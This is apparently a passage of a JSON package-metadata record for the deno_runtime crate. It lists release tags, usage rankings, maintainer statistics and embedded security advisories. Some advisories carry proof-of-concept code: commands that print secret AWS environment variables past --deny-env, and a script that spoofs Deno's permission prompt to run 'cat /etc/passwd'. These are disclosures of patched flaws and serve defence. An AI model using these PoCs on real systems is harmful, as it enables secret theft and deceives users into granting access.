1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-07T21:59:45.062Z","dependent_packages_count":24,"downloads":615158,"downloads_period":"total","dependent_repos_count":36,"rankings":{"downloads":5.593924716715999,"dependent_repos_count":4.835815539206891,"dependent_packages_count":1.7123287671232876,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":3.162618784527705},"purl":"pkg:cargo/deno_runtime","advisories":[{"uuid":"GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN","url":"https://github.com/advisories/GHSA-7w8p-chxq-2789","title":"Deno.env.toObject() ignores the variables listed in --deny-env and returns all environment variables","description":"### Summary\nThe [Deno.env.toObject](https://docs.deno.com/api/deno/~/Deno.Env.toObject) method ignores any variables listed in the `--deny-env` option of the `deno run` command. When looking at the [documentation](https://docs.deno.com/runtime/fundamentals/security/#environment-variables) of the `--deny-env` option this might lead to a false impression that variables listed in the option are impossible to read.\n\n### PoC\n\n```\nexport AWS_SECRET_ACCESS_KEY=my-secret-aws-key\n\n# Works as expected. The program stops with a \"NotCapable\" error message\necho 'console.log(Deno.env.get(\"AWS_SECRET_ACCESS_KEY\"));' | deno run \\\n  --allow-env \\\n  --deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -\n\n# All enviroment variables are printed and the --deny-env list is completely disregarded\necho 'console.log(Deno.env.toObject());' | deno run \\\n  --allow-env \\\n  --deny-env=AWS_ACCESS_KEY_ID,AWS_SECRET_ACCESS_KEY -\n```\n\nThe first example using `get` exits with the following error:\n```\nerror: Uncaught (in promise) NotCapable: Requires env access to \"AWS_SECRET_ACCESS_KEY\", run again with the --allow-env flag\nconsole.log(Deno.env.get(\"AWS_SECRET_ACCESS_KEY\"));\n                     ^\n    at Object.getEnv [as get] (ext:deno_os/30_os.js:124:10)\n    at file:///$deno$stdin.mts:1:22\n```\n\nThe second example  using `toObject` prints all environment variables:\n```\n[Object: null prototype] {\n  ...\n  AWS_SECRET_ACCESS_KEY: \"my-secret-aws-key\",\n  ...\n}\n```\n\n### Impact\nSoftware relying on the combination of both flags to allow access to most environment variables except a few sensitive ones will be vulnerable to malicious code trying to steal secrets using the Deno.env.toObject() method.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:18:18.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-7w8p-chxq-2789","https://github.com/denoland/deno/pull/29079","https://github.com/denoland/deno/commit/2959e083912420988066a001c2b2d6732a1b562f","https://github.com/denoland/deno/commit/946ccda1aa19a00c478a5e6826b75053b050d753","https://docs.deno.com/api/deno/~/Deno.Env.toObject","https://docs.deno.com/runtime/fundamentals/security/#environment-variables","https://nvd.nist.gov/vuln/detail/CVE-2025-48934","https://github.com/advisories/GHSA-7w8p-chxq-2789"],"source_kind":"github","identifiers":["GHSA-7w8p-chxq-2789","CVE-2025-48934"],"repository_url":"https://github.com/denoland/deno","blast_radius":8.55966375422008,"created_at":"2025-06-04T22:08:12.484Z","updated_at":"2026-09-07T05:05:33.180Z","epss_percentage":0.00426,"epss_percentile":0.35616,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.212.0","vulnerable_version_range":"\u003c 0.212.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.2.13","vulnerable_version_range":"\u003e= 2.2.0, \u003c 2.2.13"},{"first_patched_version":"2.1.13","vulnerable_version_range":"\u003c 2.1.13"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03dzhwLWNoeHEtMjc4Oc4ABIpN/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM","url":"https://github.com/advisories/GHSA-xqxc-x6p3-w683","title":"Deno run with --allow-read and --deny-read flags results in allowed","description":"### Summary\n\n`deno run --allow-read --deny-read main.ts` results in allowed, even though 'deny' should be stronger. Same with all global unary permissions given as `--allow-* --deny-*`.\n\n### Details\n\nCaused by the fast exit logic in #22894.\n\n### PoC\n\nRun the above command expecting no permissions to be passed.\n\n### Impact\n\nThis only affects a nonsensical combination of flags, so there shouldn't be a real impact on the userbase.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2025-06-04T21:13:44.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P","references":["https://github.com/denoland/deno/security/advisories/GHSA-xqxc-x6p3-w683","https://github.com/denoland/deno/pull/22894","https://github.com/denoland/deno/pull/29213","https://github.com/denoland/deno/commit/2f0fae9d9071dcaf0a689bc7097584b1b9ebc8db","https://github.com/denoland/deno/commit/9d665572d3cd39f997e29e6daac7c1102fc5c04f","https://github.com/denoland/deno/commit/ef315b56c26c9ef5f25284a5100d2ed525a148cf","https://nvd.nist.gov/vuln/detail/CVE-2025-48888","https://github.com/advisories/GHSA-xqxc-x6p3-w683"],"source_kind":"github","identifiers":["GHSA-xqxc-x6p3-w683","CVE-2025-48888"],"repository_url":"https://github.com/denoland/deno","blast_radius":8.55966375422008,"created_at":"2025-06-04T22:08:12.932Z","updated_at":"2026-09-07T05:05:33.181Z","epss_percentage":0.00406,"epss_percentile":0.33785,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.212.0","vulnerable_version_range":"\u003e= 0.150.0, \u003c 0.212.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.3.2","vulnerable_version_range":"\u003e= 2.3.0, \u003c 2.3.2"},{"first_patched_version":"2.2.13","vulnerable_version_range":"\u003e= 2.2.0, \u003c 2.2.13"},{"first_patched_version":"2.1.13","vulnerable_version_range":"\u003e= 1.41.3, \u003c 2.1.13"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14cXhjLXg2cDMtdzY4M84ABIpM/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS","url":"https://github.com/advisories/GHSA-vc52-gwm3-8v2f","title":"Missing \"--allow-net\" permission check for built-in Node modules","description":"### Impact\n\nOutbound HTTP requests made using the built-in \"node:http\" or \"node:https\" modules are incorrectly not checked against the network permission allow list (`--allow-net`). Dependencies relying on these built-in modules are subject to the vulnerability too.\n\nUsers of Deno versions prior to 1.34.0 are unaffected. Deno Deploy users are unaffected.\n\n### Patches\n\nThis problem has been patched in Deno v1.34.1 and all users are recommended to update to this version.\n\n### Workarounds\n\nNo workaround is available for this issue.\n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-05-31T23:39:40.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.6,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-vc52-gwm3-8v2f","https://nvd.nist.gov/vuln/detail/CVE-2023-33966","https://github.com/denoland/deno/releases/tag/v1.34.1","https://github.com/advisories/GHSA-vc52-gwm3-8v2f"],"source_kind":"github","identifiers":["GHSA-vc52-gwm3-8v2f","CVE-2023-33966"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-06-01T00:03:15.490Z","updated_at":"2026-09-08T21:11:39.497Z","epss_percentage":0.00625,"epss_percentile":0.47751,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.115.0","vulnerable_version_range":"= 0.114.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.34.1","vulnerable_version_range":"= 1.34.0"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12YzUyLWd3bTMtOHYyZs4AAzkS/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO","url":"https://github.com/advisories/GHSA-vq67-rp93-65qf","title":"Interactive `run` permission prompt spoofing via improper ANSI neutralization","description":"### Summary\nArbitrary program names without any ANSI filtering allows any malicious program to clear the first 2 lines of a `op_spawn_child` or `op_kill` prompt and replace it with any desired text.\n\n### Details\n\nThe main entry point comes down to the ability to override what the API control says ([40_process.js](https://github.com/denoland/deno/blob/7d13d65468c37022f003bb680dfbddd07ea72173/runtime/js/40_process.js#L175)). Because of ANSI code's ability to clear lines, a malicious program can clear the last 2 lines of the prompt and put their own header. This also works in `op_kill`.\n\n### PoC\n\nThis PoC works on 1.31.1, but modified versions of it work on older versions.\n\nMake a file, e.g. `index.ts`, that uses this vulnerability to spoof the `op_spawn_child` permission prompt\n\n```ts\nconst boldANSI = \"\\u001b[1m\" // bold\nconst unboldANSI = \"\\u001b[22m\" // unbold\n\nconst prompt = `┌ ⚠️  ${boldANSI}Deno requests run access to \"echo\"${unboldANSI}\n├ Requested by \\`Deno.Command().output()`\n\nconst moveANSIUp = \"\\u001b[1A\" // moves to the start of the line\nconst clearANSI = \"\\u001b[2K\" // clears the line\nconst moveANSIStart = \"\\u001b[1000D\" // moves to the start of the line\n\nDeno[Object.getOwnPropertySymbols(Deno)[0]].core.ops.op_spawn_child({\n    cmd: \"cat\",\n    args: [\"/etc/passwd\"],\n    clearEnv: false,\n    env: [],\n    stdin: \"null\",\n    stdout: \"inherit\",\n    stderr: \"piped\"\n}, moveANSIUp + clearANSI + moveANSIStart + prompt)\n```\n\nRun the file with `deno run index.ts`.\n\n### Impact\nAny Deno program is able to spoof the interactive permission prompt for the `op_spawn_child` or the `op_kill` action (which indirectly gives access to all run commands) by overriding the `Requested by {message} API` with their own ANSI codes, allowing them to clear the latter prompt and change it to whatever they needed:\n\n```\n// Expected Prompt\n┌ ⚠️  Deno requests run access to \"cat\"\n├ Requested by `Deno.Command().output()` API\n├ Run again with --allow-run to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) \u003e\n\n// Actual Prompt\n┌ ⚠️  Deno requests run access to \"echo\"\n├ Requested by `Deno.Command().output()` API\n├ Run again with --allow-run to bypass this prompt.\n└ Allow? [y/n/A] (y = yes, allow; n = no, deny; A = allow all run permissions) \u003e\n```\n\nThis works with any command on the respective platform, giving the program the full ability to choose what program they wanted to run.\n\nThis problem can not be exploited on systems that do not attach an interactive prompt (for example headless servers).\n\nBefore `v1.31.0`, this requires the `--unstable` flag. \n","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2023-03-24T22:06:01.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":8.8,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-vq67-rp93-65qf","https://nvd.nist.gov/vuln/detail/CVE-2023-28446","https://github.com/denoland/deno/blob/7d13d65468c37022f003bb680dfbddd07ea72173/runtime/js/40_process.js#L175","https://github.com/denoland/deno/releases/tag/v1.31.2","https://github.com/advisories/GHSA-vq67-rp93-65qf"],"source_kind":"github","identifiers":["GHSA-vq67-rp93-65qf","CVE-2023-28446"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-03-24T23:03:48.690Z","updated_at":"2026-09-03T07:12:47.317Z","epss_percentage":0.01132,"epss_percentile":0.6422,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"1.31.2","vulnerable_version_range":"\u003e= 1.8.0, \u003c 1.31.2"}],"purl":"pkg:cargo/deno"},{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"1.31.2","vulnerable_version_range":"\u003e= 1.8.0, \u003c 1.31.2"}],"purl":"pkg:cargo/deno_runtime"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12cTY3LXJwOTMtNjVxZs4AAyUO/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","url":"https://github.com/advisories/GHSA-c25x-cm9x-qqgx","title":"Deno improperly handles resizable ArrayBuffer","description":"### Impact\n\n[Resizable ArrayBuffers](https://github.com/tc39/proposal-resizablearraybuffer) passed to asynchronous native functions that are shrunk during the asynchronous operation could result in an out-of-bound read/write.\n\nIt is unlikely that this has been exploited in the wild, as the only version affected is Deno 1.32.0.\n\nDeno Deploy users are not affected.\n\n### Patches\n\nThe problem has been resolved by disabling resizable ArrayBuffers temporarily in Deno 1.32.1. A future version of Deno will re-enable resizable ArrayBuffers with a proper fix.\n\n### Workarounds\n\nUpgrade to Deno 1.32.1, or run with `--v8-flags=--no-harmony-rab-gsab` to disable resizable ArrayBuffers.","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2023-03-23T23:13:25.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.9,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H","references":["https://github.com/denoland/deno/security/advisories/GHSA-c25x-cm9x-qqgx","https://github.com/denoland/deno/pull/18395","https://github.com/denoland/deno/releases/tag/v1.32.1","https://nvd.nist.gov/vuln/detail/CVE-2023-28445","https://github.com/denoland/deno/pull/18452","https://github.com/advisories/GHSA-c25x-cm9x-qqgx"],"source_kind":"github","identifiers":["GHSA-c25x-cm9x-qqgx","CVE-2023-28445"],"repository_url":"https://github.com/denoland/deno","blast_radius":0.0,"created_at":"2023-03-24T00:03:53.363Z","updated_at":"2026-09-08T21:11:42.176Z","epss_percentage":0.00971,"epss_percentile":0.59653,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG","packages":[{"ecosystem":"cargo","package_name":"deno_runtime","versions":[{"first_patched_version":"0.103.0","vulnerable_version_range":"= 0.102.0"}],"purl":"pkg:cargo/deno_runtime"},{"ecosystem":"cargo","package_name":"serde_v8","versions":[{"first_patched_version":"0.88.0","vulnerable_version_range":"= 0.87.0"}],"purl":"pkg:cargo/serde_v8"},{"ecosystem":"cargo","package_name":"Deno","versions":[{"first_patched_version":"1.32.1","vulnerable_version_range":"= 1.32.0"}],"purl":"pkg:cargo/Deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jMjV4LWNtOXgtcXFneM4AAyRG/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_runtime","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_runtime","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_runtime/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-09-07T13:25:49.747Z","issues_count":6659,"pull_requests_count":9671,"avg_time_to_close_issue":17134708.21400472,"avg_time_to_close_pull_request":1530358.8397069778,"issues_closed_count":3811,"pull_requests_closed_count":8053,"pull_request_authors_count":591,"issue_authors_count":2494,"avg_comments_per_issue":2.5029283676227663,"avg_comments_per_pull_request":0.7209182090786889,"merged_pull_requests_count":7031,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":681,"past_year_pull_requests_count":1194,"past_year_avg_time_to_close_issue":1348806.688034188,"past_year_avg_time_to_close_pull_request":1303670.810240964,"past_year_issues_closed_count":234,"past_year_pull_requests_closed_count":664,"past_year_pull_request_authors_count":193,"past_year_issue_authors_count":377,"past_year_avg_comments_per_issue":1.234948604992658,"past_year_avg_comments_per_pull_request":1.134003350083752,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":2,"past_year_merged_pull_requests_count":497,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1803,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1731,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":285,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":268,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":149,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":396,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":183,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"crowlKats","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"devsnek","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_runtime/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_runtime/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_runtime/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_runtime/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_runtime/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_runtime/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek 